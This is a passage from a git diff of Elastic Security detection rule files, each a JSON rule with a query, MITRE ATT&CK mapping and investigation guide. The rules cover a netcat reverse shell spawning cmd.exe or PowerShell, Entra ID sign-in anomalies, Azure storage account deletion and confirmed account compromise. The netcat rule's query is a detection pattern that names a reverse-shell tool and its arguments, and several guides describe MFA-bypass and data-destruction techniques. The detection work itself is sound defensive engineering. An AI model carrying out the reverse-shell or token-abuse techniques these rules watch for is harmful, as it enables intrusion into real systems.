Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "9aa4be8d-5828-417d-9f54-7cd304571b24_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json b/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json new file mode 100644 index 00000000000..5aa6705a8f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempt to execute via a reverse shell using the netcat utility to execute Windows commands using the default interpreters like Cmd.exe and Powershell.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Command Shell via NetCat", + "note": "## Triage and analysis\n\n### Investigating Potential Command Shell via NetCat\n\nAttackers may abuse the NetCat utility to execute commands 
remotely using the built-in Windows Command Shell interpreters.\n\n#### Possible investigation steps\n\n- Verify if the user is authorized to use the Netcat utility.\n- Investigate the process execution chain (parent process tree) and how the netcat binary was dropped.\n- Review the network connections made by the parent process and check their reputation.\n- Investigate all child processes spawned by the Cmd or PowerShell instance.\n- Examine the host for other alerts within the same period.\n\n### False positive analysis\n\n- Authorized IT support or system administrator activity using NetCat.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : (\"cmd.exe\", \"powershell.exe\") and process.parent.args : \"-e\" and\n (\n (process.parent.args_count == 5 and process.parent.command_line regex~ \"\"\".*[0-9]{1,3}(\\.[0-9]{1,3}){3}.*\"\"\") or\n (process.parent.args : \"-*l*\" and process.parent.args : \"-*p*\" and process.parent.args : (\"cmd.exe\", \"powershell.exe\"))\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + } + ], + "risk_score": 73, + "rule_id": "9c0f61fa-abf4-4b11-8d9d-5978c09182dd", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": 
"https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json deleted file mode 100644 index 125706907bb..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Entra ID Rare Authentication Requirement for Principal User", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name", - "azure.signinlogs.properties.authentication_requirement" - ], - "note": "## Triage and analysis\n\n### Investigating Azure Entra ID Rare Authentication Requirement for Principal User\n\nIdentifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity.\n\n**This is a New Terms rule that focuses on first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication requirement `azure.signinlogs.properties.authentication_requirement` in the last 14-days.**\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. 
Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review Conditional Access policies to ensure they are correctly configured, enforce risk-based authentication, and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving 
threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset: \"azure.signinlogs\" and event.category: \"authentication\"\n and azure.signinlogs.properties.user_type: \"Member\"\n and not azure.signinlogs.properties.client_app_used: \"Browser\"\n and not source.as.organization.name: \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n", - "references": [ - "https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.client_app_used", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.user_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "9e11faee-fddb-11ef-8257-f661ea17fbcd", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "9e11faee-fddb-11ef-8257-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json new file mode 100644 index 00000000000..e31a22efc53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an Azure Storage Account is deleted. Adversaries may delete storage accounts to disrupt operations, destroy evidence, or cause denial of service. This activity could indicate an attacker attempting to cover their tracks after data exfiltration or as part of a destructive attack. Monitoring storage account deletions is critical for detecting potential impact on business operations and data availability.", + "false_positives": [ + "Storage administrators may legitimately delete storage accounts during decommissioning, resource cleanup, or infrastructure optimization. 
Verify that the deletion was expected and follows organizational change management processes. Consider exceptions for approved maintenance windows." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Account Deletion by Unusual User", + "new_terms_fields": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Storage Account Deletion by Unusual User\n\nAzure Storage Accounts provide scalable cloud storage for applications and services. Deletion of storage accounts is a high-impact operation that permanently removes all contained data including blobs, files, queues, and tables. Adversaries may delete storage accounts to destroy evidence of their activities, disrupt business operations, or cause denial of service as part of ransomware or destructive attacks. This detection monitors for successful storage account deletion operations to identify potential malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the storage account deletion by examining the principal ID, UPN and user agent fields.\n- Check the specific storage account name in `azure.resource.name` to understand which storage resources were deleted and assess the business impact.\n- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns, privilege escalation attempts, or other resource deletions.\n- Examine the user's recent activity history to identify any other storage accounts or Azure resources that were deleted or modified by the same principal.\n- Verify if the storage account deletion aligns with approved change requests or maintenance windows in your organization.\n- Check if the deleted storage account contained critical data and whether backups are available for recovery.\n- Review any related alerts or activities such as data exfiltration, configuration changes, or access policy modifications that occurred before the deletion.\n- Investigate if the account was recently compromised by checking for suspicious authentication events or privilege escalations.\n\n### False positive analysis\n\n- Legitimate decommissioning of unused storage accounts may trigger this alert. Document approved storage account cleanup activities and coordinate with infrastructure teams to understand planned deletions.\n- DevOps automation tools might delete temporary storage accounts as part of infrastructure lifecycle management. Identify service principals used by CI/CD pipelines and consider creating exceptions for these automated processes.\n- Testing and development environments may have frequent storage account creation and deletion cycles. Consider filtering out non-production storage accounts if appropriate for your environment.\n- Cost optimization initiatives may involve deleting unused or redundant storage accounts. 
Coordinate with finance and infrastructure teams to understand planned resource optimization activities.\n\n### Response and remediation\n\n- Immediately investigate whether the deletion was authorized by verifying with the account owner or relevant stakeholders.\n- If the deletion was unauthorized, attempt to recover the storage account if soft-delete is enabled, or restore data from backups.\n- Disable the compromised user account or service principal if unauthorized activity is confirmed and investigate how the credentials were obtained.\n- Review and restrict Azure RBAC permissions to ensure only authorized users have storage account deletion capabilities (requires Contributor or Owner role).\n- Implement Azure Resource Locks to prevent accidental or malicious deletion of critical storage accounts.\n- Configure Azure Activity Log alerts to notify security teams immediately when storage accounts are deleted.\n- Conduct a full security assessment to identify any other compromised resources or accounts and look for indicators of broader compromise.\n- Document the incident and update security policies and procedures to prevent similar incidents in the future.\n", + "query": "event.dataset: azure.activitylogs and\n azure.activitylogs.operation_name: \"MICROSOFT.STORAGE/STORAGEACCOUNTS/DELETE\" and\n azure.activitylogs.identity.claims_initiated_by_user.name: *\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims_initiated_by_user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + }, + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json new file mode 100644 index 00000000000..608c3788a79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an administrator has manually confirmed a user or sign-in as compromised in Microsoft Entra ID Protection. 
This indicates that an administrator has reviewed the risk detection and determined that the user account or sign-in activity is definitively compromised. This is a high-confidence indicator of account compromise and should be investigated immediately.", + "false_positives": [ + "Administrators may mark accounts as compromised during security testing or incident response exercises. If this is expected behavior in your environment, consider adjusting the rule or adding exceptions for specific test accounts." + ], + "from": "now-9m", + "index": [ + "logs-azure.identity_protection-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "event.action", + "azure.identityprotection.properties.risk_detail", + "azure.identityprotection.properties.risk_level", + "azure.identityprotection.properties.risk_state", + "azure.identityprotection.properties.risk_event_type", + "azure.identityprotection.properties.risk_type", + "azure.identityprotection.properties.user_principal_name", + "azure.identityprotection.properties.user_display_name", + "azure.identityprotection.properties.user_id", + "azure.identityprotection.properties.ip_address", + "azure.identityprotection.properties.activity", + "azure.identityprotection.properties.additional_info", + "azure.identityprotection.properties.correlation_id", + "azure.correlation_id", + "source.ip" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID Protection Admin Confirmed Compromise", + "note": "## Triage and analysis\n\nThis rule detects when an administrator has manually confirmed a user or sign-in as compromised in Microsoft Entra ID Protection. This is a critical security event that requires immediate investigation and response.\n\n### Possible investigation steps\n\n- Review the `azure.identityprotection.properties.risk_detail` field to determine if the compromise was confirmed at the sign-in level (`adminConfirmedSigninCompromised`) or user level (`adminConfirmedUserCompromised`).\n- Check the `azure.identityprotection.properties.user_principal_name` field to identify the compromised user account.\n- Review the `azure.identityprotection.properties.user_display_name` field for additional user identification information.\n- Examine the `azure.identityprotection.properties.risk_level` field to understand the severity level assigned to the risk event.\n- Check the `azure.identityprotection.properties.risk_state` field to verify the current state of the risk (should be confirmed as compromised).\n- Review the `azure.correlation_id` field to correlate this event with other related security events, including the original risk detections that led to the admin confirmation.\n- Investigate the timeline of events leading up to the admin confirmation by reviewing Entra ID sign-in logs and audit logs for the affected user.\n- Check for any suspicious activities associated with the user account, including:\n - Unusual sign-in locations or IP addresses\n - Access to sensitive resources or applications\n - Changes to user profile, permissions, or MFA settings\n - Bulk email sending or data exfiltration activities\n- Review the `azure.identityprotection.properties.additional_info` field for any additional context provided by the administrator or Entra ID Protection.\n- Identify which administrator confirmed the compromise by reviewing Entra ID audit logs for risk state changes.\n\n### False positive analysis\n\n- Security testing or penetration testing exercises may result in administrators confirming test accounts as 
compromised. If this is expected behavior, consider excluding specific test accounts or implementing a testing account naming convention to filter.\n- Incident response drills or tabletop exercises may involve marking accounts as compromised for training purposes. Coordinate with security teams to identify planned exercises.\n\n### Response and remediation\n\n- Immediately reset the password for the compromised user account and require the user to set a new password upon next sign-in.\n- Revoke all active sessions and authentication tokens for the compromised account, including:\n - Primary refresh tokens (PRTs)\n - OAuth tokens\n - Session cookies\n - Application-specific passwords\n- Review and revoke any suspicious OAuth consent grants or application permissions added by the compromised account.\n- Enable or enforce multi-factor authentication (MFA) for the affected user account if not already enabled.\n- Review all activities performed by the compromised account, including:\n - Email forwarding rules or inbox rules\n - File access and downloads\n - Changes to security settings or permissions\n - Creation of new users or service principals\n- Assess the scope of the compromise by identifying any lateral movement or privilege escalation activities.\n- Consider disabling the account temporarily until the investigation is complete and all remediation steps are verified.\n- Implement conditional access policies to prevent future compromises, such as requiring MFA from untrusted locations or blocking legacy authentication.\n- Review and strengthen identity protection policies and risk-based conditional access rules.\n- Document the incident, including the timeline, scope of compromise, and remediation actions taken.\n- Conduct a post-incident review to identify gaps in security controls and implement improvements to prevent similar incidents.\n", + "query": "event.dataset: azure.identity_protection and\n azure.identityprotection.properties.risk_detail: (\n \"adminConfirmedSigninCompromised\" or\n \"adminConfirmedUserCompromised\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-investigate-risk", + "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks", + "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.identityprotection.properties.risk_detail", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 99, + "rule_id": "a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890", + "setup": "#### Required Microsoft Entra ID Protection Logs\nTo use this rule, ensure that Microsoft Entra ID Protection logs are being collected and streamed into the Elastic Stack via the Azure integration.\n", + "severity": "critical", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Protection Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + 
"subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json deleted file mode 100644 index b1f686b083d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role.", - "false_positives": [ - "Sign-ins using PowerShell may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be signing into your environment. Sign-ins from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory PowerShell Sign-in", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory PowerShell Sign-in\n\nAzure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage their Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the directory, create new objects in the directory, update existing objects, remove objects, as well as configure the directory and its features.\n\nThis rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized access if done outside of IT or engineering.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the involved user account. 
Do they look normal?\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings that weakens the security policy, persistence-related tasks, and data access.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users as exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.app_display_name:\"Azure Active Directory PowerShell\" and\n azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success)\n", - "references": [ - "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/", - "https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.app_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.token_issuer_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - 
"Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json deleted file mode 100644 index dc941f2b8e3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e).", - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-azure.signinlogs-*", - "logs-azure.activitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Entra ID Device Code Auth with Broker Client", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Entra ID Device Code Auth with Broker Client\n\nEntra ID Device Code Authentication allows users to authenticate devices using a code, facilitating seamless access to Azure resources. Adversaries exploit this by compromising Primary Refresh Tokens (PRTs) to bypass multi-factor authentication and Conditional Access policies. 
The detection rule identifies unauthorized access attempts by monitoring successful sign-ins using device code authentication linked to a specific broker client application ID, flagging potential misuse.\n\n### Possible investigation steps\n\n- Review the sign-in logs to confirm the use of device code authentication by checking the field azure.signinlogs.properties.authentication_protocol for the value deviceCode.\n- Verify the application ID involved in the sign-in attempt by examining azure.signinlogs.properties.conditional_access_audiences.application_id and ensure it matches 29d9ed98-a469-4536-ade2-f981bc1d605e.\n- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious.\n- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise.\n- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.\n- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.\n\n### False positive analysis\n\n- Legitimate device code authentication by trusted applications or users may trigger the rule. Review the application ID and user context to confirm legitimacy.\n- Frequent access by automated scripts or services using device code authentication can be 